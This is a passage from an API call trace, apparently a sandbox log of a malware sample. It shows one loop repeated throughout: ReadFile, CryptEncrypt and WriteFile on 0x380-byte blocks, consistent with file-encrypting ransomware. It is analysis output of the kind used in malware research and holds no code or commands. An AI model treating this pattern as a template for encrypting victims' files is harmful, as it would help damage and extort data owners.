lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.053] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.053] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.053] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.053] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.054] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.055] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.056] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.057] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.058] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.059] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, 